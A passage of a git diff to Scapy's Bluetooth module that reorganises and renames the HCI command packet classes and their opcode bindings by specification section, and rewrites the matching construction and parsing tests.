ByteField("page_scan_repetition_mode", 0x02), ByteField("reserved", 0x0), LEShortField("clock_offset", 0x0), ] -class HCI_Cmd_LE_Create_Connection(Packet): - name = "LE Create Connection" - fields_desc = [LEShortField("interval", 96), - LEShortField("window", 48), - ByteEnumField("filter", 0, {0: "address"}), - ByteEnumField("patype", 0, {0: "public", 1: "random"}), - LEMACField("paddr", None), - ByteEnumField("atype", 0, {0: "public", 1: "random"}), - LEShortField("min_interval", 40), - LEShortField("max_interval", 56), - LEShortField("latency", 0), - LEShortField("timeout", 42), - LEShortField("min_ce", 0), - LEShortField("max_ce", 0), ] +# 7.2 Link Policy commands, the OGF is defined as 0x02 +class HCI_Cmd_Hold_Mode(Packet): + name = "HCI_Hold_Mode" + fields_desc = [LEShortField("connection_handle", 0), + LEShortField("hold_mode_max_interval", 0x0002), + LEShortField("hold_mode_min_interval", 0x0002), ] -class HCI_Cmd_LE_Create_Connection_Cancel(Packet): - name = "LE Create Connection Cancel" +# 7.3 CONTROLLER & BASEBAND COMMANDS, the OGF is defined as 0x03 +class HCI_Cmd_Set_Event_Mask(Packet): + name = "HCI_Set_Event_Mask" + fields_desc = [StrFixedLenField("mask", b"\xff\xff\xfb\xff\x07\xf8\xbf\x3d", 8)] # noqa: E501 -class HCI_Cmd_LE_Read_White_List_Size(Packet): - name = "LE Read White List Size" +class HCI_Cmd_Reset(Packet): + name = "HCI_Reset" -class HCI_Cmd_LE_Clear_White_List(Packet): - name = "LE Clear White List" +class HCI_Cmd_Set_Event_Filter(Packet): + name = "HCI_Set_Event_Filter" + fields_desc = [ByteEnumField("type", 0, {0: "clear"}), ] -class HCI_Cmd_LE_Add_Device_To_White_List(Packet): - name = "LE Add Device to White List" - fields_desc = [ByteEnumField("atype", 0, {0: "public", 1: "random"}), - LEMACField("address", None)] + +class HCI_Cmd_Write_Local_Name(Packet): + name = "HCI_Write_Local_Name" + fields_desc = [StrField("name", "")] -class HCI_Cmd_LE_Remove_Device_From_White_List(HCI_Cmd_LE_Add_Device_To_White_List): # noqa: E501 - name = "LE Remove Device from White List" +class HCI_Cmd_Write_Connect_Accept_Timeout(Packet): + name = "HCI_Write_Connection_Accept_Timeout" + fields_desc = [LEShortField("timeout", 32000)] # 32000 slots is 20000 msec -class HCI_Cmd_LE_Connection_Update(Packet): - name = "LE Connection Update" - fields_desc = [XLEShortField("handle", 0), - XLEShortField("min_interval", 0), - XLEShortField("max_interval", 0), - XLEShortField("latency", 0), - XLEShortField("timeout", 0), - LEShortField("min_ce", 0), - LEShortField("max_ce", 0xffff), ] +class HCI_Cmd_Write_Extended_Inquiry_Response(Packet): + name = "HCI_Write_Extended_Inquiry_Response" + fields_desc = [ByteField("fec_required", 0), + PacketListField("eir_data", [], EIR_Hdr, + length_from=lambda pkt:pkt.len)] -class HCI_Cmd_LE_Read_Buffer_Size(Packet): - name = "LE Read Buffer Size" +class HCI_Cmd_Read_LE_Host_Support(Packet): + name = "HCI_Read_LE_Host_Support" -class HCI_Cmd_LE_Read_Remote_Used_Features(Packet): - name = "LE Read Remote Used Features" - fields_desc = [LEShortField("handle", 64)] +class HCI_Cmd_Write_LE_Host_Support(Packet): + name = "HCI_Write_LE_Host_Support" + fields_desc = [ByteField("supported", 1), + ByteField("unused", 1), ] + + +# 7.4 INFORMATIONAL PARAMETERS, the OGF is defined as 0x04 +class HCI_Cmd_Read_BD_Addr(Packet): + name = "HCI_Read_BD_ADDR" + +# 7.5 STATUS PARAMETERS, the OGF is defined as 0x05 + + +class HCI_Cmd_Read_Link_Quality(Packet): + name = "HCI_Read_Link_Quality" + fields_desc = [LEShortField("handle", 0)] + + +class HCI_Cmd_Read_RSSI(Packet): + name = "HCI_Read_RSSI" + fields_desc = [LEShortField("handle", 0)] + + +# 7.6 TESTING COMMANDS, the OGF is defined as 0x06 +class HCI_Cmd_Read_Loopback_Mode(Packet): + name = "HCI_Read_Loopback_Mode" + + +class HCI_Cmd_Write_Loopback_Mode(Packet): + name = "HCI_Write_Loopback_Mode" + fields_desc = [ByteEnumField("loopback_mode", 0, + {0: "no loopback", + 1: "enable local loopback", + 2: "enable remote loopback"})] + + +# 7.8 LE CONTROLLER COMMANDS, the OGF code is defined as 0x08 +class HCI_Cmd_LE_Read_Buffer_Size_V1(Packet): + name = "HCI_LE_Read_Buffer_Size [v1]" + + +class HCI_Cmd_LE_Read_Buffer_Size_V2(Packet): + name = "HCI_LE_Read_Buffer_Size [v2]" + + +class HCI_Cmd_LE_Read_Local_Supported_Features(Packet): + name = "HCI_LE_Read_Local_Supported_Features" class HCI_Cmd_LE_Set_Random_Address(Packet): - name = "LE Set Random Address" + name = "HCI_LE_Set_Random_Address" fields_desc = [LEMACField("address", None)] class HCI_Cmd_LE_Set_Advertising_Parameters(Packet): - name = "LE Set Advertising Parameters" + name = "HCI_LE_Set_Advertising_Parameters" fields_desc = [LEShortField("interval_min", 0x0800), LEShortField("interval_max", 0x0800), ByteEnumField("adv_type", 0, {0: "ADV_IND", 1: "ADV_DIRECT_IND", 2: "ADV_SCAN_IND", 3: "ADV_NONCONN_IND", 4: "ADV_DIRECT_IND_LOW"}), # noqa: E501 @@ -1083,7 +1098,7 @@ class HCI_Cmd_LE_Set_Advertising_Parameters(Packet): class HCI_Cmd_LE_Set_Advertising_Data(Packet): - name = "LE Set Advertising Data" + name = "HCI_LE_Set_Advertising_Data" fields_desc = [FieldLenField("len", None, length_of="data", fmt="B"), PadField( PacketListField("data", [], EIR_Hdr, @@ -1092,35 +1107,109 @@ class HCI_Cmd_LE_Set_Advertising_Data(Packet): class HCI_Cmd_LE_Set_Scan_Response_Data(Packet): - name = "LE Set Scan Response Data" + name = "HCI_LE_Set_Scan_Response_Data" fields_desc = [FieldLenField("len", None, length_of="data", fmt="B"), StrLenField("data", "", length_from=lambda pkt:pkt.len), ] class HCI_Cmd_LE_Set_Advertise_Enable(Packet): - name = "LE Set Advertise Enable" + name = "HCI_LE_Set_Advertising_Enable" fields_desc = [ByteField("enable", 0)] -class HCI_Cmd_LE_Start_Encryption_Request(Packet): - name = "LE Start Encryption" +class HCI_Cmd_LE_Set_Scan_Parameters(Packet): + name = "HCI_LE_Set_Scan_Parameters" + fields_desc = [ByteEnumField("type", 0, {0: "passive", 1: "active"}), + XLEShortField("interval", 16), + XLEShortField("window", 16), + ByteEnumField("atype", 0, {0: "public", + 1: "random", + 2: "rpa (pub)", + 3: "rpa (random)"}), + ByteEnumField("policy", 0, {0: "all", 1: "whitelist"})] + + +class HCI_Cmd_LE_Set_Scan_Enable(Packet): + name = "HCI_LE_Set_Scan_Enable" + fields_desc = [ByteField("enable", 1), + ByteField("filter_dups", 1), ] + + +class HCI_Cmd_LE_Create_Connection(Packet): + name = "HCI_LE_Create_Connection" + fields_desc = [LEShortField("interval", 96), + LEShortField("window", 48), + ByteEnumField("filter", 0, {0: "address"}), + ByteEnumField("patype", 0, {0: "public", 1: "random"}), + LEMACField("paddr", None), + ByteEnumField("atype", 0, {0: "public", 1: "random"}), + LEShortField("min_interval", 40), + LEShortField("max_interval", 56), + LEShortField("latency", 0), + LEShortField("timeout", 42), + LEShortField("min_ce", 0), + LEShortField("max_ce", 0), ] + + +class HCI_Cmd_LE_Create_Connection_Cancel(Packet): + name = "HCI_LE_Create_Connection_Cancel" + + +class HCI_Cmd_LE_Read_Filter_Accept_List_Size(Packet): + name = "HCI_LE_Read_Filter_Accept_List_Size" + + +class HCI_Cmd_LE_Clear_Filter_Accept_List(Packet): + name = "HCI_LE_Clear_Filter_Accept_List" + + +class HCI_Cmd_LE_Add_Device_To_Filter_Accept_List(Packet): + name = "HCI_LE_Add_Device_To_Filter_Accept_List" + fields_desc = [ByteEnumField("address_type", 0, {0: "public", + 1: "random", + 0xff: "anonymous"}), + LEMACField("address", None)] + + +class HCI_Cmd_LE_Remove_Device_From_Filter_Accept_List(HCI_Cmd_LE_Add_Device_To_Filter_Accept_List): # noqa: E501 + name = "HCI_LE_Remove_Device_From_Filter_Accept_List" + + +class HCI_Cmd_LE_Connection_Update(Packet): + name = "HCI_LE_Connection_Update" + fields_desc = [XLEShortField("handle", 0), + XLEShortField("min_interval", 0), + XLEShortField("max_interval", 0), + XLEShortField("latency", 0), + XLEShortField("timeout", 0), + LEShortField("min_ce", 0), + LEShortField("max_ce", 0xffff), ] + + +class HCI_Cmd_LE_Read_Remote_Features(Packet): + name = "HCI_LE_Read_Remote_Features" + fields_desc = [LEShortField("handle", 64)] + + +class HCI_Cmd_LE_Enable_Encryption(Packet): + name = "HCI_LE_Enable_Encryption" fields_desc = [LEShortField("handle", 0), StrFixedLenField("rand", None, 8), XLEShortField("ediv", 0), StrFixedLenField("ltk", b'\x00' * 16, 16), ] -class HCI_Cmd_LE_Long_Term_Key_Request_Negative_Reply(Packet): - name = "LE Long Term Key Request Negative Reply" - fields_desc = [LEShortField("handle", 0), ] - - class HCI_Cmd_LE_Long_Term_Key_Request_Reply(Packet): - name = "LE Long Term Key Request Reply" + name = "HCI_LE_Long_Term_Key_Request_Reply" fields_desc = [LEShortField("handle", 0), StrFixedLenField("ltk", b'\x00' * 16, 16), ] +class HCI_Cmd_LE_Long_Term_Key_Request_Negative_Reply(Packet): + name = "HCI_LE_Long_Term_Key_Request _Negative_Reply" + fields_desc = [LEShortField("handle", 0), ] + + class HCI_Event_Hdr(Packet): name = "HCI Event header" fields_desc = [XByteField("code", 0), @@ -1290,40 +1379,69 @@ class HCI_LE_Meta_Long_Term_Key_Request(Packet): conf.l2types.register(DLT_BLUETOOTH_HCI_H4_WITH_PHDR, HCI_PHDR_Hdr) conf.l2types.register(DLT_BLUETOOTH_LINUX_MONITOR, BT_Mon_Pcap_Hdr) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Create_Connection, opcode=0x0405) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Disconnect, opcode=0x0406) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Link_Key_Request_Reply, opcode=0x040b) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Authentication_Requested, opcode=0x0411) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Set_Connection_Encryption, opcode=0x0413) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Remote_Name_Request, opcode=0x0419) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Set_Event_Mask, opcode=0x0c01) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Reset, opcode=0x0c03) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Set_Event_Filter, opcode=0x0c05) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Write_Local_Name, opcode=0x0c13) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Connect_Accept_Timeout, opcode=0x0c16) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Write_Extended_Inquiry_Response, opcode=0x0c52) # noqa: E501 -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Host_Supported, opcode=0x0c6d) -bind_layers(HCI_Command_Hdr, HCI_Cmd_Read_BD_Addr, opcode=0x1009) -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Read_Buffer_Size, opcode=0x2002) -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Random_Address, opcode=0x2005) -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Advertising_Parameters, opcode=0x2006) # noqa: E501 -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Advertising_Data, opcode=0x2008) -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Scan_Response_Data, opcode=0x2009) -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Advertise_Enable, opcode=0x200a) -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Scan_Parameters, opcode=0x200b) -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Scan_Enable, opcode=0x200c) -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Create_Connection, opcode=0x200d) -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Create_Connection_Cancel, opcode=0x200e) # noqa: E501 -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Read_White_List_Size, opcode=0x200f) -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Clear_White_List, opcode=0x2010) -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Add_Device_To_White_List, opcode=0x2011) # noqa: E501 -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Remove_Device_From_White_List, opcode=0x2012) # noqa: E501 -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Connection_Update, opcode=0x2013) -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Read_Remote_Used_Features, opcode=0x2016) # noqa: E501 -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Start_Encryption_Request, opcode=0x2019) # noqa: E501 -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Long_Term_Key_Request_Reply, opcode=0x201a) # noqa: E501 -bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Long_Term_Key_Request_Negative_Reply, opcode=0x201b) # noqa: E501 +# 7.1 LINK CONTROL COMMANDS, the OGF is defined as 0x01 +bind_layers(HCI_Command_Hdr, HCI_Cmd_Inquiry, ogf=0x01, ocf=0x0001) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Inquiry_Cancel, ogf=0x01, ocf=0x0002) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Periodic_Inquiry_Mode, ogf=0x01, ocf=0x0003) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Exit_Peiodic_Inquiry_Mode, ogf=0x01, ocf=0x0004) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Create_Connection, ogf=0x01, ocf=0x0005) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Disconnect, ogf=0x01, ocf=0x0006) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Link_Key_Request_Reply, ogf=0x01, ocf=0x000b) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Authentication_Requested, ogf=0x01, ocf=0x0011) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Set_Connection_Encryption, ogf=0x01, ocf=0x0013) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Remote_Name_Request, ogf=0x01, ocf=0x0019) + +# 7.2 Link Policy commands, the OGF is defined as 0x02 +bind_layers(HCI_Command_Hdr, HCI_Cmd_Hold_Mode, ogf=0x02, ocf=0x0001) + +# 7.3 CONTROLLER & BASEBAND COMMANDS, the OGF is defined as 0x03 +bind_layers(HCI_Command_Hdr, HCI_Cmd_Set_Event_Mask, ogf=0x03, ocf=0x0001) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Reset, ogf=0x03, ocf=0x0003) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Set_Event_Filter, ogf=0x03, ocf=0x0005) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Write_Local_Name, ogf=0x03, ocf=0x0013) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Write_Connect_Accept_Timeout, ogf=0x03, ocf=0x0016) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Write_Extended_Inquiry_Response, ogf=0x03, ocf=0x0052) # noqa: E501 +bind_layers(HCI_Command_Hdr, HCI_Cmd_Read_LE_Host_Support, ogf=0x03, ocf=0x006c) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Write_LE_Host_Support, ogf=0x03, ocf=0x006d) + +# 7.4 INFORMATIONAL PARAMETERS, the OGF is defined as 0x04 +bind_layers(HCI_Command_Hdr, HCI_Cmd_Read_BD_Addr, ogf=0x04, ocf=0x0009) + +# 7.5 STATUS PARAMETERS, the OGF is defined as 0x05 +bind_layers(HCI_Command_Hdr, HCI_Cmd_Read_Link_Quality, ogf=0x05, ocf=0x0003) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Read_RSSI, ogf=0x05, ocf=0x0005) + +# 7.6 TESTING COMMANDS, the OGF is defined as 0x06 +bind_layers(HCI_Command_Hdr, HCI_Cmd_Read_Loopback_Mode, ogf=0x06, ocf=0x0001) +bind_layers(HCI_Command_Hdr, HCI_Cmd_Write_Loopback_Mode, ogf=0x06, ocf=0x0002) + +# 7.8 LE CONTROLLER COMMANDS, the OGF code is defined as 0x08 +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Read_Buffer_Size_V1, ogf=0x08, ocf=0x0002) +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Read_Buffer_Size_V2, ogf=0x08, ocf=0x0060) +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Read_Local_Supported_Features, + ogf=0x08, ocf=0x0003) +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Random_Address, ogf=0x08, ocf=0x0005) +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Advertising_Parameters, ogf=0x08, ocf=0x0006) # noqa: E501 +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Advertising_Data, ogf=0x08, ocf=0x0008) +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Scan_Response_Data, ogf=0x08, ocf=0x0009) +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Advertise_Enable, ogf=0x08, ocf=0x000a) +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Scan_Parameters, ogf=0x08, ocf=0x000b) +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Set_Scan_Enable, ogf=0x08, ocf=0x000c) +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Create_Connection, ogf=0x08, ocf=0x000d) +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Create_Connection_Cancel, ogf=0x08, ocf=0x000e) # noqa: E501 +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Read_Filter_Accept_List_Size, + ogf=0x08, ocf=0x000f) +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Clear_Filter_Accept_List, ogf=0x08, ocf=0x0010) +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Add_Device_To_Filter_Accept_List, ogf=0x08, ocf=0x0011) # noqa: E501 +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Remove_Device_From_Filter_Accept_List, ogf=0x08, ocf=0x0012) # noqa: E501 +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Connection_Update, ogf=0x08, ocf=0x0013) +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Read_Remote_Features, ogf=0x08, ocf=0x0016) # noqa: E501 +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Enable_Encryption, ogf=0x08, ocf=0x0019) # noqa: E501 +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Long_Term_Key_Request_Reply, ogf=0x08, ocf=0x001a) # noqa: E501 +bind_layers(HCI_Command_Hdr, HCI_Cmd_LE_Long_Term_Key_Request_Negative_Reply, ogf=0x08, ocf=0x001b) # noqa: E501 + +# 7.7 EVENTS bind_layers(HCI_Event_Hdr, HCI_Event_Connect_Complete, code=0x03) bind_layers(HCI_Event_Hdr, HCI_Event_Disconnection_Complete, code=0x05) bind_layers(HCI_Event_Hdr, HCI_Event_Remote_Name_Request_Complete, code=0x07) diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index c103fb0081b..1743e6de91c 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -3,50 +3,146 @@ + Bluetooth tests = HCI layers -# a huge packet with all classes in it! -pkt = HCI_ACL_Hdr()/HCI_Cmd_Create_Connection()/HCI_Cmd_Complete_Read_BD_Addr()/HCI_Cmd_Connect_Accept_Timeout()/HCI_Cmd_Disconnect()/HCI_Cmd_LE_Connection_Update()/HCI_Cmd_LE_Create_Connection()/HCI_Cmd_LE_Create_Connection_Cancel()/HCI_Cmd_LE_Host_Supported()/HCI_Cmd_LE_Long_Term_Key_Request_Negative_Reply()/HCI_Cmd_LE_Long_Term_Key_Request_Reply()/HCI_Cmd_LE_Read_Buffer_Size()/HCI_Cmd_LE_Set_Advertise_Enable()/HCI_Cmd_LE_Set_Advertising_Data()/HCI_Cmd_LE_Set_Advertising_Parameters()/HCI_Cmd_LE_Set_Random_Address()/HCI_Cmd_LE_Set_Scan_Enable()/HCI_Cmd_LE_Set_Scan_Parameters()/HCI_Cmd_LE_Start_Encryption_Request()/HCI_Cmd_Authentication_Requested()/HCI_Cmd_Link_Key_Request_Reply()/HCI_Cmd_Read_BD_Addr()/HCI_Cmd_Remote_Name_Request()/HCI_Cmd_Reset()/HCI_Cmd_Set_Connection_Encryption()/HCI_Cmd_Set_Event_Filter()/HCI_Cmd_Set_Event_Mask()/HCI_Command_Hdr()/HCI_Event_Command_Complete()/HCI_Event_Command_Status()/HCI_Event_Connect_Complete()/HCI_Event_Disconnection_Complete()/HCI_Event_Encryption_Change()/HCI_Event_Remote_Name_Request_Complete()/HCI_Event_Hdr()/HCI_Event_LE_Meta()/HCI_Event_Number_Of_Completed_Packets()/HCI_Hdr()/HCI_LE_Meta_Advertising_Reports()/HCI_LE_Meta_Connection_Complete()/HCI_LE_Meta_Connection_Update_Complete()/HCI_LE_Meta_Long_Term_Key_Request() -assert HCI_ACL_Hdr in pkt.layers() -assert HCI_Cmd_Create_Connection in pkt.layers() -assert HCI_Cmd_Complete_Read_BD_Addr in pkt.layers() -assert HCI_Cmd_Connect_Accept_Timeout in pkt.layers() -assert HCI_Cmd_Disconnect in pkt.layers() -assert HCI_Cmd_LE_Connection_Update in pkt.layers() -assert HCI_Cmd_LE_Create_Connection in pkt.layers() -assert HCI_Cmd_LE_Create_Connection_Cancel in pkt.layers() -assert HCI_Cmd_LE_Host_Supported in pkt.layers() -assert HCI_Cmd_LE_Long_Term_Key_Request_Negative_Reply in pkt.layers() -assert HCI_Cmd_LE_Long_Term_Key_Request_Reply in pkt.layers() -assert HCI_Cmd_LE_Read_Buffer_Size in pkt.layers() -assert HCI_Cmd_LE_Set_Advertise_Enable in pkt.layers() -assert HCI_Cmd_LE_Set_Advertising_Data in pkt.layers() -assert HCI_Cmd_LE_Set_Advertising_Parameters in pkt.layers() -assert HCI_Cmd_LE_Set_Random_Address in pkt.layers() -assert HCI_Cmd_LE_Set_Scan_Enable in pkt.layers() -assert HCI_Cmd_LE_Set_Scan_Parameters in pkt.layers() -assert HCI_Cmd_LE_Start_Encryption_Request in pkt.layers() -assert HCI_Cmd_Authentication_Requested in pkt.layers() -assert HCI_Cmd_Link_Key_Request_Reply in pkt.layers() -assert HCI_Cmd_Read_BD_Addr in pkt.layers() -assert HCI_Cmd_Remote_Name_Request in pkt.layers() -assert HCI_Cmd_Reset in pkt.layers() -assert HCI_Cmd_Set_Connection_Encryption in pkt.layers() -assert HCI_Cmd_Set_Event_Filter in pkt.layers() -assert HCI_Cmd_Set_Event_Mask in pkt.layers() -assert HCI_Command_Hdr in pkt.layers() -assert HCI_Event_Command_Complete in pkt.layers() -assert HCI_Event_Command_Status in pkt.layers() -assert HCI_Event_Connect_Complete in pkt.layers() -assert HCI_Event_Disconnection_Complete in pkt.layers() -assert HCI_Event_Encryption_Change in pkt.layers() -assert HCI_Event_Remote_Name_Request_Complete in pkt.layers() -assert HCI_Event_Hdr in pkt.layers() -assert HCI_Event_LE_Meta in pkt.layers() -assert HCI_Event_Number_Of_Completed_Packets in pkt.layers() -assert HCI_Hdr in pkt.layers() -assert HCI_LE_Meta_Advertising_Reports in pkt.layers() -assert HCI_LE_Meta_Connection_Complete in pkt.layers() -assert HCI_LE_Meta_Connection_Update_Complete in pkt.layers() -assert HCI_LE_Meta_Long_Term_Key_Request in pkt.layers() + +# HCI_Command_Hdr +# default construction +hci_cmd_hdr = HCI_Command_Hdr() +assert hci_cmd_hdr.ogf == 0 +assert hci_cmd_hdr.ocf == 0 +assert hci_cmd_hdr.len == None +assert raw(hci_cmd_hdr) == b'\x00\x00\x00' + +# parsing +hci_cmd_hdr = HCI_Command_Hdr(raw(hci_cmd_hdr)) +assert hci_cmd_hdr.ogf == 0 +assert hci_cmd_hdr.ocf == 0 +assert hci_cmd_hdr.len == 0 + +# HCI_Cmd_Inquiry default construction +hci_cmd_inquiry = HCI_Command_Hdr() / HCI_Cmd_Inquiry() +assert hci_cmd_inquiry.ogf == 0x01 +assert hci_cmd_inquiry.ocf == 0x01 +assert hci_cmd_inquiry.len == None +assert hci_cmd_inquiry.lap == 0x9e8b33 +assert hci_cmd_inquiry.inquiry_length == 0 +assert hci_cmd_inquiry.num_responses == 0 + +# parsing +hci_cmd_inquiry = HCI_Command_Hdr(raw(hci_cmd_inquiry)) +assert hci_cmd_inquiry.ogf == 0x01 +assert hci_cmd_inquiry.ocf == 0x01 +assert hci_cmd_inquiry.len == 5 +assert hci_cmd_inquiry.lap == 0x9e8b33 +assert hci_cmd_inquiry.inquiry_length == 0 +assert hci_cmd_inquiry.num_responses == 0 + +# HCI_Cmd_Inquiry constructing an invalid packet +hci_cmd_inquiry = HCI_Command_Hdr(len = 10) / HCI_Cmd_Inquiry() +assert hci_cmd_inquiry.ogf == 0x01 +assert hci_cmd_inquiry.ocf == 0x01 +assert hci_cmd_inquiry.len == 10 +assert hci_cmd_inquiry.lap == 0x9e8b33 +assert hci_cmd_inquiry.inquiry_length == 0 +assert hci_cmd_inquiry.num_responses == 0 + +assert raw(hci_cmd_inquiry)[2] == 10 + +# parse the invalid packet +hci_cmd_inquiry = HCI_Command_Hdr(raw(hci_cmd_inquiry)) +assert hci_cmd_inquiry.ogf == 0x01 +assert hci_cmd_inquiry.ocf == 0x01 +assert hci_cmd_inquiry.len == 10 +assert hci_cmd_inquiry.lap == 0x9e8b33 +assert hci_cmd_inquiry.inquiry_length == 0 +assert hci_cmd_inquiry.num_responses == 0 + +# HCI_Cmd_Inquiry_Cancel default construction +hci_cmd_inquiry_cancel = HCI_Command_Hdr() / HCI_Cmd_Inquiry_Cancel() +assert hci_cmd_inquiry_cancel.ogf == 0x01 +assert hci_cmd_inquiry_cancel.ocf == 0x02 +assert hci_cmd_inquiry_cancel.len == None + +# hci_cmd_inquiry_cancel parsing +hci_cmd_inquiry_cancel = HCI_Command_Hdr(raw(hci_cmd_inquiry_cancel)) +assert hci_cmd_inquiry_cancel.ogf == 0x01 +assert hci_cmd_inquiry_cancel.ocf == 0x02 +assert hci_cmd_inquiry_cancel.len == 0 + + +# Hci_Cmd_Hold_Mode +hci_cmd_hold_mode = HCI_Command_Hdr() / HCI_Cmd_Hold_Mode() +assert hci_cmd_hold_mode.ogf == 0x02 +assert hci_cmd_hold_mode.ocf == 0x01 +assert hci_cmd_hold_mode.len == None + +# parsing +hci_cmd_hold_mode = HCI_Command_Hdr(raw(hci_cmd_hold_mode)) +assert hci_cmd_hold_mode.ogf == 0x02 +assert hci_cmd_hold_mode.ocf == 0x01 +assert hci_cmd_hold_mode.len == 6 + +# HCI_Cmd_Set_Event_Mask +hci_cmd_set_event_mask = HCI_Command_Hdr() / HCI_Cmd_Set_Event_Mask() +assert hci_cmd_set_event_mask.ogf == 0x03 +assert hci_cmd_set_event_mask.ocf == 0x01 +assert hci_cmd_set_event_mask.len == None + +# parsing +hci_cmd_set_event_mask = HCI_Command_Hdr(raw(hci_cmd_set_event_mask)) +assert hci_cmd_set_event_mask.ogf == 0x03 +assert hci_cmd_set_event_mask.ocf == 0x01 +assert hci_cmd_set_event_mask.len == 8 + +# HCI_Cmd_Read_BD_Addr +hci_cmd_read_bd_addr = HCI_Command_Hdr() / HCI_Cmd_Read_BD_Addr() +assert hci_cmd_read_bd_addr.ogf == 0x04 +assert hci_cmd_read_bd_addr.ocf == 0x09 +assert hci_cmd_read_bd_addr.len == None + +# parsing +hci_cmd_read_bd_addr = HCI_Command_Hdr(raw(hci_cmd_read_bd_addr)) +assert hci_cmd_read_bd_addr.ogf == 0x04 +assert hci_cmd_read_bd_addr.ocf == 0x09 +assert hci_cmd_read_bd_addr.len == 0 + + +# HCI_Cmd_Read_Link_Quality +hci_cmd_read_link_quality = HCI_Command_Hdr() / HCI_Cmd_Read_Link_Quality() +assert hci_cmd_read_link_quality.ogf == 0x05 +assert hci_cmd_read_link_quality.ocf == 0x03 +assert hci_cmd_read_link_quality.len == None + +# parsing +hci_cmd_read_link_quality = HCI_Command_Hdr(raw(hci_cmd_read_link_quality)) +assert hci_cmd_read_link_quality.ogf == 0x05 +assert hci_cmd_read_link_quality.ocf == 0x03 +assert hci_cmd_read_link_quality.len == 2 + + +# HCI_Cmd_Read_Loopback_Mode +hci_cmd_read_loopback_mode = HCI_Command_Hdr() / HCI_Cmd_Read_Loopback_Mode() +assert hci_cmd_read_loopback_mode.ogf == 0x06 +assert hci_cmd_read_loopback_mode.ocf == 0x01 +assert hci_cmd_read_loopback_mode.len == None + +# parsing +hci_cmd_read_loopback_mode = HCI_Command_Hdr(raw(hci_cmd_read_loopback_mode)) +assert hci_cmd_read_loopback_mode.ogf == 0x06 +assert hci_cmd_read_loopback_mode.ocf == 0x01 +assert hci_cmd_read_loopback_mode.len == 0 + + +# HCI_Cmd_LE_Read_Buffer_Size_V1 +hci_cmd_le_read_buffer_size_v1 = HCI_Command_Hdr() / HCI_Cmd_LE_Read_Buffer_Size_V1() +assert hci_cmd_le_read_buffer_size_v1.ogf == 0x08 +assert hci_cmd_le_read_buffer_size_v1.ocf == 0x02 +assert hci_cmd_le_read_buffer_size_v1.len == None + +# parsing +hci_cmd_le_read_buffer_size_v1 = HCI_Command_Hdr(raw(hci_cmd_le_read_buffer_size_v1)) +assert hci_cmd_le_read_buffer_size_v1.ogf == 0x08 +assert hci_cmd_le_read_buffer_size_v1.ocf == 0x02 +assert hci_cmd_le_read_buffer_size_v1.len == 0 + Bluetooth Transport Layers = Test 